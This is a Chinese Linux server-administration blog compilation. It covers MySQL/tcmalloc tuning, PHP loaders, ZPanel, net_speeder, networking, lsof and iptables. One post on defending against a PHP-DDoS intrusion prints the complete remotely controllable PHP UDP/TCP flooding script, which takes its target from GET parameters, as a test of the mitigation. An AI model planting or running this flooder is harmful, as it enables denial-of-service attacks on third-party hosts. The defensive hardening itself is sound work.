分类 Linux 下的文章

环境 CentOS 6.3 64bit

安装libunwind库(32位系统可省略次步)

wget http://download.savannah.gnu.org/releases/libunwind/libunwind-0.99-alpha.tar.gz

tar zxvf libunwind-0.99-alpha.tar.gz

cd libunwind-0.99-alpha/

CFLAGS=-fPIC ./configure

make CFLAGS=-fPIC

make CFLAGS=-fPIC install

安装Tcmalloc

wget http://gperftools.googlecode.com/files/gperftools-2.0.tar.gz

tar zxvf  gperftools-2.0.tar.gz

cd gperftools-2.0/

./configure

make && make install

echo "/usr/local/lib" > /etc/ld.so.conf.d/usr_local_lib.conf

/sbin/ldconfig

编译完成后,我们编辑mysqld_safe文件,加入Tcmalloc部分。

vi /usr/bin/mysqld_safe

# 找到# executing mysqld_safe,在下面加入:
export LD_PRELOAD=/usr/local/lib/libtcmalloc.so

# 保存,退出,重启MySQL。
service mysqld restart

检查是否加载成功,运行:lsof -n | grep tcmalloc
显示如下类似内容即Ok

mysqld 32573 mysql mem REG 9,3 13771446
/usr/local/lib/libtcmalloc.so.4.1.0 (path dev=0,53)

修改配置文件

运行:

vi /etc/my.cnf

全选替换为:

[mysqld]
datadir=/var/lib/mysql
socket=/var/lib/mysql/mysql.sock
user=mysql
# Disabling symbolic-links is recommended to prevent assorted security risks
symbolic-links=0

# 12/17/2013 Add
local-infile=0
skip-locking
query_cache_limit=1M
query_cache_size=32M
query_cache_type=1
max_connections=500
interactive_timeout=100
wait_timeout=100
connect_timeout=10
thread_cache_size=128
key_buffer=16M
join_buffer=1M
max_allowed_packet=16M
table_cache=1024
record_buffer=1M
sort_buffer_size=2M
read_buffer_size=2M
max_connect_errors=10
# Try number of CPU's*2 for thread_concurrency
thread_concurrency=2
myisam_sort_buffer_size=64M
server-id=1

[mysqld_safe]
log-error=/var/log/mysqld.log
pid-file=/var/run/mysqld/mysqld.pid
open_files_limit=8192

[mysqldump]
quick
max_allowed_packet=16M

[mysql]
no-auto-rehash
#safe-updates

[isamchk]
key_buffer=64M
sort_buffer=64M
read_buffer=16M
write_buffer=16M

[myisamchk]
key_buffer=64M
sort_buffer=64M
read_buffer=16M
write_buffer=16M

[mysqlhotcopy]
interactive-timeout

以上配置可根据自己服务器情况修改参数!
最后保存退出,运行 service mysqld restart 重启MySQL,完成。

查看httpd错误日记:/var/log/httpd/error_log

[Tue Dec 17 18:47:11 2013] [notice] Digest: done
Failed loading /usr/local/lib/ioncube/ioncube_loader_lin_5.3.so: /usr/local/lib/ioncube/ioncube_loader_lin_5.3.so: wrong ELF class: ELFCLASS32
eAccelerator: Could not allocate 67108864 bytes, the maximum size the kernel allows is 33554432 bytes. Lower the amount of memory request or increase the limit in /proc/sys/kernel/shmmax.
PHP Warning: [eAccelerator] Can not create shared memory area in Unknown on line 0
PHP Fatal error: Unable to start eAccelerator module in Unknown on line 0

知道问题就好办了

vi /etc/php.d/eaccelerator.ini

eaccelerator.shm_size 把值改成15(根据自己服务器配置修改)

# 按下 Esc 键退出编辑

:wq

#保存退出

本文内容转载:http://yzpanel.duapp.com/
需要更多详细内容,请访问原作者网站。

安装PHP加速器eAccelerator

yum install make
wget -c http://yzpanel.duapp.com/down/eaccelerator-0.9.6.1.tar.bz2
tar xjf eaccelerator-0.9.6.1.tar.bz2
cd eaccelerator-0.9.6.1
/usr/bin/phpize
./configure -enable-eaccelerator=shared -with-php-config=/usr/bin/php-config
make
make install
cd /
rm -rf eaccelerator-0.9.6.1
rm -rf eaccelerator-0.9.6.1.tar.bz2
mkdir /tmp/eaccelerator
chmod 777 /tmp/eaccelerator

cd /etc/php.d/

wget http://yzpanel.duapp.com/down/eaccelerator/Xen-eaccelerator.ini
mv Xen-eaccelerator.ini eaccelerator.ini

wget http://yzpanel.duapp.com/down/eaccelerator/OPENVZ-eaccelerator.ini
mv OPENVZ-eaccelerator.ini eaccelerator.ini

这一步二选择一即可,根据实际情况选择Xen架构就下载Xen-eaccelerator.ini;OPENVZ架构就下载OPENVZ-eaccelerator.ini

安装 ionCube

cd /
wget -c http://yzpanel.duapp.com/down/ioncube_loaders_lin_x86.zip
unzip ioncube_loaders_lin_x86
mv ioncube /usr/local/lib/
编辑文件/etc/php.ini 添加
zend_extension = "/usr/local/lib/ioncube/ioncube_loader_lin_5.3.so"

安装 Zend Guard Loader

cd /root
wget http://downloads.zend.com/guard/5.5.0/ZendGuardLoader-php-5.3-linux-glibc23-x86_64.tar.gz
sudo mkdir /usr/zend
tar -zxvf ZendGuardLoader-php-5.3-linux-glibc23-x86_64.tar.gz
sudo cp /root/ZendGuardLoader-php-5.3-linux-glibc23-x86_64/php-5.3.x/ZendGuardLoader.so /usr/zend/

编辑文件/etc/php.ini 
在zend_extension = "/usr/local/lib/ioncube/ioncube_loader_lin_5.3.so" 后面添加

zend_extension=/usr/zend/ZendGuardLoader.so
zend_loader.enable=1
zend_loader.disable_licensing=0
zend_loader.obfuscation_level_support=3
zend_loader.license_path=

安装完成之后 service httpd restart 重启httpd服务 然后用php -v查看是否安装成功

ZPanelcp是国外的虚拟主机控制面板,简单易用,界面美观,支持Debian,Ubuntu,CentOS,FreeBSD,Windows系统!官方有一键安装包,默认集成安装ProFTPD、MySQL、phpMyadmin、WebMail、DNS模块。占用内存也比较少,大概100M左右。官方有汉化语言包,还有很多的扩展模块,甚至有计费模块,如果要开展虚拟主机业务都不用买WHMCS了。如果有时间,接下来会接着发一些关于ZPanelcp的文章。

安装 - 环境 CentOS 6.3 64bit

wget http://www.zvps.co.uk/sites/default/files/downloads/centos-6-3/package/installer-x86_64-install.sh.x.tar.gz
tar -xf installer-x86_64-install.sh.x.tar.gz
chmod +x installer-x86_64-install.sh.x
yum install ld-linux.so.2
./installer-x86_64-install.sh.x

以上命令执行完成后会显示如下:

To contine please agree to the GPL license (y/n/q)? y (这里输入y同意许可协议)
Find your timezone from : http://php.net/manual/en/timezones.php e.g Europe/London
Enter Your Time Zone: Asia/Chongqing (这里输入Asia/Chongqing使用亚洲时区)
Install fresh ZPanel server or enter an upgrade version number e.g 10-1-0 :install (这里直接回车)
Enter the FQDN of the server (example: zpanel.yourdomain.com): (主机名默认即可这里直接回车,也可以输入)
Enter the Public (external) IP of the server: 输入IP (公网IP地址输入你的独立IP)
MySQL Password is currently blank, please change it now.
Password you will use for MySQL: 输入phpMyadmin管理密码 (mysql的root密码)
Re-enter the password you will use for MySQL: 再次输入输入phpMyadmin管理密码 (再次输入mysql的root密码)
ZPanel will now install, are you sure (y/n/q)? y (y开始安装)

完成以上操作后会自动进行安装,安装完成后会显示系统管理员密码,保存在 /root/passwords.txt 。之后访问服务器IP即可登入系统,用户是zadmin。

安装ZPanel中文汉化语言包

zppy repo add zpanel-packages.sammottley.co.uk
zppy update
zppy install ZXTS

在Server Admin->Module Admin下开启 在Administrator下打上勾

在Server Admin菜单下就能看到ZXTS了点击进入找到Mandarin -> Install or Update 进入安装下载 提示:Translations was added successfully

在My Account->Choose Language:选择Mandarin->Update Account 这里最好全都修改为你的信息因为如果Email不修改会报错不能保存。

安装K-File Manager文件管理器

zppy repo add rustus.txt-clan.com
zppy update
zppy install kfm

安装好后到模块管理勾选,允许用户使用。

来看看现在的样子吧。
ZPanel

官方网站:http://www.zpanelcp.com/
官方论坛:http://forums.zpanelcp.com/index.php
张永鹏ZPanel的教程:http://yzpanel.duapp.com/

Google资料的时候,无意发现的,效果非常不错!
占用内存小(5M左右),适用多平台(OpenVZ可用)
单线程下载速度提升2-10倍,抽的时候效果更明显。拿了个拉斯维加斯的VPS测试,安装之前,联通6M单线程下载速度在50kb/s左右摇摆,启用后上升到400kb+

效果是不错的!不过作者也说了对于不加速就可以跑满带宽的类型来讲(多线程下载),开启后反而由于多出来的无效流量,导致速度减半。所以对于多线程/高速链路,这个方案是不适合的。

一键安装代码转载于hostloc的@lazyzhu
将如下代码保存为:net_speeder_lazyinstall.sh

#!/bin/sh
 
# Set Linux PATH Environment Variables
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:~/bin
export PATH
 
# Check If You Are Root
if [ $(id -u) != "0" ]; then
    clear
    echo -e "\033[31m Error: You must be root to run this script! \033[0m"
    exit 1
fi
 
if [ $(arch) == x86_64 ]; then
    OSB=x86_64
elif [ $(arch) == i686 ]; then
    OSB=i386
else
    echo "\033[31m Error: Unable to Determine OS Bit. \033[0m"
    exit 1
fi
if egrep -q "5.*" /etc/issue; then
    OST=5
    wget http://dl.fedoraproject.org/pub/epel/5/${OSB}/epel-release-5-4.noarch.rpm
elif egrep -q "6.*" /etc/issue; then
    OST=6
    wget http://dl.fedoraproject.org/pub/epel/6/${OSB}/epel-release-6-8.noarch.rpm
else
    echo "\033[31m Error: Unable to Determine OS Version. \033[0m"
    exit 1
fi
 
rpm -Uvh epel-release*rpm
yum install -y libnet libnet-devel libpcap libpcap-devel gcc
 
wget http://net-speeder.googlecode.com/files/net_speeder-v0.1.tar.gz -O -|tar xz
cd net_speeder
if [ -f /proc/user_beancounters ] || [ -d /proc/bc ]; then
    sh build.sh -DCOOKED
    INTERFACE=venet0
else
    sh build.sh
    INTERFACE=eth0
fi
 
NS_PATH=/usr/local/net_speeder
mkdir -p $NS_PATH
cp -Rf net_speeder $NS_PATH
 
echo -e "\033[36m net_speeder installed. \033[0m"
echo -e "\033[36m Usage: nohup ${NS_PATH}/net_speeder $INTERFACE \"ip\" >/dev/null 2>&1 & \033[0m"

之后执行

sh net_speeder_lazyinstall.sh

项目作者:http://www.snooda.com/read/324
googe项目库:http://code.google.com/p/net-speeder/
本文部分参考: http://www.im1987.com/post/853.html

以CentOS系统为例,我们经常通过SSH连接到服务器或者VPS作业,编译程序需要比较长的时间,比如LNMP、DA等。如果此时网络突然断开连接,那就折腾了!我们可以安装Screen来预防这种情况,即使和远程服务器断开连接,编译依然会继续进行,我们重新连接后就可以恢复到原来的界面,也许已经安装完成了。

screen -S lnmp #创建一个screen会话,名称为 lnmp

如果提示找不到命令,我们可以运行安装命令:yum install screen

命令:

screen -ls #查看所有screen会话
快捷键 Ctrl+a+d 保存当前的screen会话,返回
exit #退出关闭screen会话
screen -wipe lnmp #删除名称为lnmp的会话
screen -r lnmp #恢复名称为lnmp的会话

一、CentOS 修改IP地址
修改对应网卡的IP地址的配置文件
# vi /etc/sysconfig/network-scripts/ifcfg-eth0
注意:用之前先看一下ifconfig,有的系统中,IP地址没有配在eth0上,配到eth1上,就要进行对应的修改修改以下内容

DEVICE=eth0 #描述网卡对应的设备别名,例如ifcfg-eth0的文件中它为eth0
BOOTPROTO=static #设置网卡获得ip地址的方式,可能的选项为static,dhcp或bootp,分别对应静态指定的 ip地址,通过dhcp协议获得的ip地址,通过bootp协议获得的ip地址
BROADCAST=192.168.0.255 #对应的子网广播地址
HWADDR=00:07:E9:05:E8:B4 #对应的网卡物理地址
IPADDR=12.168.1.2 #如果设置网卡获得 ip地址的方式为静态指定,此字段就指定了网卡对应的ip地址
IPV6INIT=no
IPV6_AUTOCONF=no
NETMASK=255.255.255.0 #网卡对应的网络掩码
NETWORK=192.168.1.0 #网卡对应的网络地址
ONBOOT=yes #系统启动时是否设置此网络接口,设置为yes时,系统启动时激活此设备

二、CentOS 修改网关
修改对应网卡的网关的配置文件
[root@centos]# vi /etc/sysconfig/network
修改以下内容
NETWORKING=yes(表示系统是否使用网络,一般设置为yes。如果设为no,则不能使用网络,而且很多系统服务程序将无法启动)
HOSTNAME=centos(设置本机的主机名,这里设置的主机名要和/etc/hosts中设置的主机名对应)
GATEWAY=192.168.1.1(设置本机连接的网关的IP地址。例如,网关为10.0.0.2)

三、CentOS 修改DNS
修改对应网卡的DNS的配置文件
# vi /etc/resolv.conf
修改以下内容
nameserver 8.8.8.8 #google域名服务器
nameserver 8.8.4.4 #google域名服务器

四、重新启动网络配置
# service network restart

# /etc/init.d/network restart

六、修改 IP 地址
即时生效:
# ifconfig eth0 192.168.0.2 netmask 255.255.255.0
启动生效:
修改 /etc/sysconfig/network-scripts/ifcfg-eth0
修改网关 Default Gateway
即时生效:
# route add default gw 192.168.0.1 dev eth0
启动生效:
修改 /etc/sysconfig/network
修改 DNS
修改/etc/resolv.conf
修改后可即时生效,启动同样有效
修改 hostname
即时生效:
# hostname centos1
启动生效:
修改/etc/sysconfig/network

参考:http://wuhuizhong.iteye.com/blog/780602

1:安装ipmitool

无论是centos,还是ubuntu都可以直接安装,源里都有

yum -y install ipmitool

apt-get -y install ipmitool

2:加载IMPI

http://wiki.adamsweet.org/doku.php?id=ipmi_on_linux

modprobe ipmi_msghandler
modprobe ipmi_devintf
modprobe ipmi_si

3:使用

查看ipmi信息

# ipmitool lan prinet

设置ipmi ipaddress

# ipmitool lan set 1 ipaddr 172.16.124.62

设置掩码

# ipmitool lan set 1 netmask 255.255.0.0

查看用户

# ipmitool user list 1
ID Name Callin Link Auth IPMI Msg Channel Priv Limit
2 ADMIN false false true ADMINISTRATOR

把管理员密码修改成 :chenshake
# ipmitool user set password 2 chenshake

参考:http://yyri.blog.163.com/blog/static/148943951201212364551621/

在Linux下glibc提供了我们事先编译好的许多timezone文件, 他们就放在/usr/share/zoneinfo这个目录下,这里基本涵盖了大部分的国家和城市

# ls -F /usr/share/zoneinfo/  
Africa/      Chile/   Factory    Iceland      Mexico/   posix/      Universal  
America/     CST6CDT  GB         Indian/      Mideast/  posixrules  US/  
Antarctica/  Cuba     GB-Eire    Iran         MST       PRC         UTC  
Arctic/      EET      GMT        iso3166.tab  MST7MDT   PST8PDT     WET  
Asia/        Egypt    GMT0       Israel       Navajo    right/      W-SU  
Atlantic/    Eire     GMT-0      Jamaica      NZ        ROC         zone.tab  
Australia/   EST      GMT+0      Japan        NZ-CHAT   ROK         Zulu  
Brazil/      EST5EDT  Greenwich  Kwajalein    Pacific/  Singapore  
Canada/      Etc/     Hongkong   Libya        Poland    Turkey  
CET          Europe/  HST        MET          Portugal  UCT  

在这里面我们就可以找到自己所在城市的time zone文件. 那么如果我们想查看对于每个time zone当前的时间我们可以用zdump命令

# zdump Hongkong  
Hongkong  Fri Jul  6 06:13:57 2007 HKT  

那么我们又怎么来告诉系统我们所在time zone是哪个呢?这里举例一种比较方便的

我们可以在/usr/share/zoneinfo下找到我们的time zone文件然后拷贝去到/etc/localtimezone(或者做个symbolic link)

我们想把time zone换成上海所在的时区就可以这么做

# ln -sf /usr/share/zoneinfo/posix/Asia/Shanghai /etc/localtime  
# date  
Fri Jul  6 06:35:52 CST 2007  

date是查看当前系统时间

第二种方法:

vi /etc/crontab
加上一句:
00 0 1 * * root rdate -s time.nist.gov
time.nist.gov 是一个时间服务器.

参考自:
http://www.linuxsir.org/bbs/thread307840.html
http://blueicer.blog.51cto.com/395686/116426

一、安装

我的是centos系统,可以直接使用yum安装。

[root@test /]# yum install lsof

等待安装成功。

如果你下载源码或者二进制安装也可以。

先下载

[root@test /]# wget http://down1.chinaunix.net/distfiles/lsof_4.76.tar.gz

安装:

[root@test /]# tar -zxvf lsof.tar.gz

[root@test /]# cd lsof_4.78/

[root@test /]# tar -xvf lsof_4.78_src.tar

[root@test /]# ./Configure linux

[root@test /]# make

不出意外的搞定手工。

二、lsof简介

lsof(list open files)是一个列出当前系统打开文件的工具。在linux环境下,任何事物都以文件的形式存在,通过文件不仅仅可以访问常规数据,还可以访问网络连接和硬件。所以如传输控制协议 (TCP) 和用户数据报协议 (UDP) 套接字等,系统在后台都为该应用程序分配了一个文件描述符,无论这个文件的本质如何,该文件描述符为应用程序与基础操作系统之间的交互提供了通用接口。因为应用程序打开文件的描述符列表提供了大量关于这个应用程序本身的信息,因此通过lsof工具能够查看这个列表对系统监测以及排错将是很有帮助的。

三、命令详解
1、在终端下输入lsof即可显示系统打开的文件,因为 lsof 需要访问核心内存和各种文件,所以必须以 root 用户的身份运行它才能够充分地发挥其功能。

lsof输出各列信息的意义如下:

COMMAND:进程的名称
PID:进程标识符
USER:进程所有者
FD:文件描述符,应用程序通过文件描述符识别该文件。如cwd、txt等
TYPE:文件类型,如DIR、REG等
DEVICE:指定磁盘的名称
SIZE:文件的大小
NODE:索引节点(文件在磁盘上的标识)
NAME:打开文件的确切名称

其中FD 列中的文件描述符cwd 值表示应用程序的当前工作目录,这是该应用程序启动的目录,除非它本身对这个目录进行更改。txt 类型的文件是程序代码,如应用程序二进制文件本身或共享库,如上列表中显示的 /sbin/init 程序。其次数值表示应用程序的文件描述符,这是打开该文件时返回的一个整数。如上的最后一行文件/dev/initctl,其文件描述符为 10。u 表示该文件被打开并处于读取/写入模式,而不是只读 (r) 或只写 (w) 模式。同时还有大写 的W 表示该应用程序具有对整个文件的写锁。该文件描述符用于确保每次只能打开一个应用程序实例。初始打开每个应用程序时,都具有三个文件描述符,从 0 到 2,分别表示标准输入、输出和错误流。所以大多数应用程序所打开的文件的 FD 都是从 3 开始。

与 FD 列相比,Type 列则比较直观。文件和目录分别称为 REG 和 DIR。而CHR 和 BLK,分别表示字符和块设备;或者 UNIX、FIFO 和 IPv4,分别表示 UNIX 域套接字、先进先出 (FIFO) 队列和网际协议 (IP) 套接字。

2、lsof常用参数

lsof 常见的用法是查找应用程序打开的文件的名称和数目。可用于查找出某个特定应用程序将日志数据记录到何处,或者正在跟踪某个问题。例如,linux限制了进程能够打开文件的数目。通常这个数值很大,所以不会产生问题,并且在需要时,应用程序可以请求更大的值(直到某个上限)。如果你怀疑应用程序耗尽了文件描述符,那么可以使用 lsof 统计打开的文件数目,以进行验证。lsof语法格式是:

lsof [options] filename

常用的参数列表:

lsof filename 显示打开指定文件的所有进程
lsof -a 表示两个参数都必须满足时才显示结果
lsof -c string 显示COMMAND列中包含指定字符的进程所有打开的文件
lsof -u username 显示所属user进程打开的文件
lsof -g gid 显示归属gid的进程情况
lsof +d /DIR/ 显示目录下被进程打开的文件
lsof +D /DIR/ 同上,但是会搜索目录下的所有目录,时间相对较长
lsof -d FD 显示指定文件描述符的进程
lsof -n 不将IP转换为hostname,缺省是不加上-n参数
lsof -i 用以显示符合条件的进程情况
lsof -i[46] [protocol][@hostname|hostaddr][:service|port]
46 --> IPv4 or IPv6
protocol --> TCP or UDP
hostname --> Internet host name
hostaddr --> IPv4地址
service --> /etc/service中的 service name (可以不只一个)
port --> 端口号 (可以不只一个)

例如: 查看22端口现在运行的情况

[root@test /]# lsof -i :22
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
sshd 1409 root 3u IPv6 5678 TCP *:ssh (LISTEN)

查看所属root用户进程所打开的文件类型为txt的文件:

[root@test /]# lsof -a -u root -d txt
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
init 1 root txt REG 3,3 38432 1763452 /sbin/init
mingetty 1632 root txt REG 3,3 14366 1763337 /sbin/mingetty
mingetty 1633 root txt REG 3,3 14366 1763337 /sbin/mingetty
mingetty 1634 root txt REG 3,3 14366 1763337 /sbin/mingetty
mingetty 1635 root txt REG 3,3 14366 1763337 /sbin/mingetty
mingetty 1636 root txt REG 3,3 14366 1763337 /sbin/mingetty
mingetty 1637 root txt REG 3,3 14366 1763337 /sbin/mingetty
kdm 1638 root txt REG 3,3 132548 1428194 /usr/bin/kdm
X 1670 root txt REG 3,3 1716396 1428336 /usr/bin/Xorg
kdm 1671 root txt REG 3,3 132548 1428194 /usr/bin/kdm
startkde 2427 root txt REG 3,3 645408 1544195 /bin/bash
... ...

3、lsof使用实例

a、查找谁在使用文件系统

在卸载文件系统时,如果该文件系统中有任何打开的文件,操作通常将会失败。那么通过lsof可以找出那些进程在使用当前要卸载的文件系统,如下:

[root@test /]# lsof /GTES11/
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
bash 4208 root cwd DIR 3,1 4096 2 /GTES11/
vim 4230 root cwd DIR 3,1 4096 2 /GTES11/

在这个示例中,用户root正在其/GTES11目录中进行一些操作。一个 bash是实例正在运行,并且它当前的目录为/GTES11,另一个则显示的是vim正在编辑/GTES11下的文件。要成功地卸载/GTES11,应该在通知用户以确保情况正常之后,中止这些进程。
这个示例说明了应用程序的当前工作目录非常重要,因为它仍保持着文件资源,并且可以防止文件系统被卸载。这就是为什么大部分守护进程(后台进程)将它们的目录更改为根目录、或服务特定的目录(如 sendmail 示例中的 /var/spool/mqueue)的原因,以避免该守护进程阻止卸载不相关的文件系统。

a、恢复删除的文件

当Linux计算机受到入侵时,常见的情况是日志文件被删除,以掩盖攻击者的踪迹。管理错误也可能导致意外删除重要的文件,比如在清理旧日志时,意外地删除了数据库的活动事务日志。有时可以通过lsof来恢复这些文件。

当进程打开了某个文件时,只要该进程保持打开该文件,即使将其删除,它依然存在于磁盘中。这意味着,进程并不知道文件已经被删除,它仍然可以向打开该文件时提供给它的文件描述符进行读取和写入。除了该进程之外,这个文件是不可见的,因为已经删除了其相应的目录索引节点。

在/proc 目录下,其中包含了反映内核和进程树的各种文件。/proc目录挂载的是在内存中所映射的一块区域,所以这些文件和目录并不存在于磁盘中,因此当我们对这些文件进行读取和写入时,实际上是在从内存中获取相关信息。大多数与 lsof 相关的信息都存储于以进程的 PID 命名的目录中,即 /proc/1234 中包含的是 PID 为 1234 的进程的信息。每个进程目录中存在着各种文件,它们可以使得应用程序简单地了解进程的内存空间、文件描述符列表、指向磁盘上的文件的符号链接和其他系统信息。lsof 程序使用该信息和其他关于内核内部状态的信息来产生其输出。所以lsof 可以显示进程的文件描述符和相关的文件名等信息。也就是我们通过访问进程的文件描述符可以找到该文件的相关信息。

当系统中的某个文件被意外地删除了,只要这个时候系统中还有进程正在访问该文件,那么我们就可以通过lsof从/proc目录下恢复该文件的内容。 假如由于误操作将/var/log/messages文件删除掉了,那么这时要将/var/log/messages文件恢复的方法如下:

首先使用lsof来查看当前是否有进程打开/var/logmessages文件,如下:

[root@test /]# lsof |grep /var/log/messages
syslogd 1283 root 2w REG 3,3 5381017 1773647 /var/log/messages (deleted)

从上面的信息可以看到 PID 1283(syslogd)打开文件的文件描述符为 2。同时还可以看到/var/log/messages已经标记被删除了。因此我们可以在 /proc/1283/fd/2 (fd下的每个以数字命名的文件表示进程对应的文件描述符)中查看相应的信息,如下:

[root@test /]# head -n 10 /proc/1283/fd/2
Aug 4 13:50:15 holmes86 syslogd 1.4.1: restart.
Aug 4 13:50:15 holmes86 kernel: klogd 1.4.1, log source = /proc/kmsg started.
Aug 4 13:50:15 holmes86 kernel: Linux version 2.6.22.1-8 (root@everestbuilder.linux-ren.org) (gcc version 4.2.0) #1 SMP Wed Jul 18 11:18:32 EDT 2007
Aug 4 13:50:15 holmes86 kernel: BIOS-provided physical RAM map:
Aug 4 13:50:15 holmes86 kernel: BIOS-e820: 0000000000000000 - 000000000009f000 (usable)
Aug 4 13:50:15 holmes86 kernel: BIOS-e820: 000000000009f000 - 00000000000a0000 (reserved)
Aug 4 13:50:15 holmes86 kernel: BIOS-e820: 0000000000100000 - 000000001f7d3800 (usable)
Aug 4 13:50:15 holmes86 kernel: BIOS-e820: 000000001f7d3800 - 0000000020000000 (reserved)
Aug 4 13:50:15 holmes86 kernel: BIOS-e820: 00000000e0000000 - 00000000f0007000 (reserved)
Aug 4 13:50:15 holmes86 kernel: BIOS-e820: 00000000f0008000 - 00000000f000c000 (reserved)

从上面的信息可以看出,查看 /proc/8663/fd/15 就可以得到所要恢复的数据。如果可以通过文件描述符查看相应的数据,那么就可以使用 I/O 重定向将其复制到文件中,如:

cat /proc/1283/fd/2 > /var/log/messages

对于许多应用程序,尤其是日志文件和数据库,这种恢复删除文件的方法非常有用。

本文参考:http://www.cnblogs.com/wanghaosoft/archive/2013/01/11/2857216.html

前几天有台香港服务器上的DEDE用户被入侵了,植入了PHP-DDOS发包代码,影响了网络,导致同服务器用户网站都无法正常访问。这段代码是用fsockopen函数请求外部,我们可以禁止这个函数。

php.ini

搜索:disable_functions
在后面加上:fsockopen

allow_url_fopen = Off

ignore_user_abort = On

以及把

extension=php_sockets.dll
改成
;extension=php_sockets.dll

保存退出,重启 Apache。

然后利用iptables,禁本机对外发送UDP包

iptables -A INPUT -p tcp -m tcp --sport 53 --dport 1024:65535 -m state --state ESTABLISHED -j ACCEPT
iptables -A INPUT -p udp -m udp --sport 53 --dport 1024:65535 -m state --state ESTABLISHED -j ACCEPT
iptables -A OUTPUT -p tcp -m tcp --sport 1024:65535 -d 8.8.4.4 --dport 53 -m state --state NEW,ESTABLISHED -j ACCEPT
iptables -A OUTPUT -p udp -m udp --sport 1024:65535 -d 8.8.8.8 --dport 53 -m state --state NEW,ESTABLISHED -j ACCEPT
iptables -A OUTPUT -p udp -j REJECT

以上就可以防止PHP-DDOS发包了,但是可能会使一些PHP程序异常,比如DZ需要fsockopen函数发信等。但都有解决办法,可以把fsockopen函数,替换为:pfsockopen,就基本可以解决所有问题了。

一段PHPDDOS代码,完成以上操作后,可以试试能否运行成功。

<?php 
error_reporting(0);//禁用错误报告 
set_time_limit(0);//配置该页最久执行时间。  0为永久执行 
ignore_user_abort(false); //设置与客户机断开是否会终止脚本的执行。 
   
/*get参数*/
$type = $_GET['type']; //攻击方式 0为TCP 1为UDP 
$host = $_GET['host'];  //攻击目标 
$port = $_GET['port'];  //攻击端口 
$exec_time = $_GET['time'];  //持续时间 
$Sendlen = $_GET['size'];   //发送数据长度  如果为0则使用自定义数据包 
$data =  $_GET['data']; //自定义数据包 最大为1024KB 格式为URL编码 
$data = urldecode($data); //URL解码后的字符串 
$count = $_GET['count']; //限制发包次数   0为不限制然后只能通过时间控制 
/*end*/
   
if (function_exists('fsockopen')){$test="1";}else{$test="0";}//fsockopen是否能用 
   
//检测服务器信息 返回格式 [标识符]函数状态|主机名|脚本名|服务器信息|结译引擎[标识符]  
if (StrLen($host)==0 or StrLen($port)==0 or StrLen($exec_time)==0){ 
        if (StrLen($_GET['rat'])<>0){ 
            echo $_GET['rat'].$test."|".$_SERVER["HTTP_HOST"]."|".GetHostByName($_SERVER
   
['SERVER_NAME'])."|".php_uname()."|".$_SERVER['SERVER_SOFTWARE'].$_GET['rat']; 
            exit; 
            } 
    echo "error"; 
    exit; 
    } 
   
$byte = 0;//记录发包次数 
$max_time = time()+$exec_time;//设置结束时间 
   
if($Sendlen!=0){ 
    for($i=0;$i<$Sendlen;$i++){$out .= "X";}//构造指定长度数据包 
}else{ 
    $out = $data;  //设置为自定义数据包 
} 
   
//死循环发送数据 
while(1){ 
    if(time() > $max_time){break;}//时间到了就跳出循环         
       
    //判断攻击方式 
    if($type==1) {     
        $fp = fsockopen("tcp://$host", $port, $errno, $errstr, 5);//打开TCP连接 
    } else {     
        $fp = fsockopen("udp://$host", $port, $errno, $errstr, 5);//打开UDP连接 
    } 
        if($fp){            //如果连接成功 
            fwrite($fp, $out);  //发送数据 
            fclose($fp);  //关闭连接 
    } 
       
    $byte++;//发包次数加1 
       
    if((int)$count!=0){ 
        if($byte > (int)$count){break;}//发包次数大于设置的就跳出循环 
    }    
} 
?>

这里只列出比较常用的参数,详细的请查看man iptables

1、查看
iptables -nvL –line-number

-L 查看当前表的所有规则,默认查看的是filter表,如果要查看NAT表,可以加上-t NAT参数
-n 不对ip地址进行反查,加上这个参数显示速度会快很多
-v 输出详细信息,包含通过该规则的数据包数量,总字节数及相应的网络接口
–line-number 显示规则的序列号,这个参数在删除或修改规则时会用到

2、添加
添加规则有两个参数:-A和-I。其中-A是添加到规则的末尾;-I可以插入到指定位置,没有指定位置的话默认插入到规则的首部。

当前规则:

[root@test ~]# iptables -nL --line-number
Chain INPUT (policy ACCEPT)
num  target     prot opt source               destination
1    DROP       all  --  192.168.1.1          0.0.0.0/0
2    DROP       all  --  192.168.1.2          0.0.0.0/0
3    DROP       all  --  192.168.1.4          0.0.0.0/0

添加一条规则到尾部:

[root@test ~]# iptables -A INPUT -s 192.168.1.5 -j DROP

再插入一条规则到第三行,将行数直接写到规则链的后面:

[root@test ~]# iptables -I INPUT 3 -s 192.168.1.3 -j DROP

查看:

[root@test ~]# iptables -nL --line-number
Chain INPUT (policy ACCEPT)
num  target     prot opt source               destination
1    DROP       all  --  192.168.1.1          0.0.0.0/0
2    DROP       all  --  192.168.1.2          0.0.0.0/0
3    DROP       all  --  192.168.1.3          0.0.0.0/0
4    DROP       all  --  192.168.1.4          0.0.0.0/0
5    DROP       all  --  192.168.1.5          0.0.0.0/0

可以看到192.168.1.3插入到第三行,而原来的第三行192.168.1.4变成了第四行。

3、删除
删除用-D参数

删除之前添加的规则(iptables -A INPUT -s 192.168.1.5 -j DROP):

[root@test ~]# iptables -D INPUT -s 192.168.1.5 -j DROP

有时候要删除的规则太长,删除时要写一大串,既浪费时间又容易写错,这时我们可以先使用–line-number找出该条规则的行号,再通过行号删除规则。

[root@test ~]# iptables -nv --line-number
iptables v1.4.7: no command specified
Try `iptables -h' or 'iptables --help' for more information.
[root@test ~]# iptables -nL --line-number
Chain INPUT (policy ACCEPT)
num  target     prot opt source               destination
1    DROP       all  --  192.168.1.1          0.0.0.0/0
2    DROP       all  --  192.168.1.2          0.0.0.0/0
3    DROP       all  --  192.168.1.3          0.0.0.0/0

删除第二行规则

[root@test ~]# iptables -D INPUT 2

4、修改
修改使用-R参数

先看下当前规则:

[root@test ~]# iptables -nL --line-number
Chain INPUT (policy ACCEPT)
num  target     prot opt source               destination
1    DROP       all  --  192.168.1.1          0.0.0.0/0
2    DROP       all  --  192.168.1.2          0.0.0.0/0
3    DROP       all  --  192.168.1.5          0.0.0.0/0

将第三条规则改为ACCEPT:

[root@test ~]# iptables -R INPUT 3 -j ACCEPT

再查看下:

[root@test ~]# iptables -nL --line-number
Chain INPUT (policy ACCEPT)
num  target     prot opt source               destination
1    DROP       all  --  192.168.1.1          0.0.0.0/0
2    DROP       all  --  192.168.1.2          0.0.0.0/0
3    ACCEPT     all  --  0.0.0.0/0            0.0.0.0/0

第三条规则的target已改为ACCEPT。

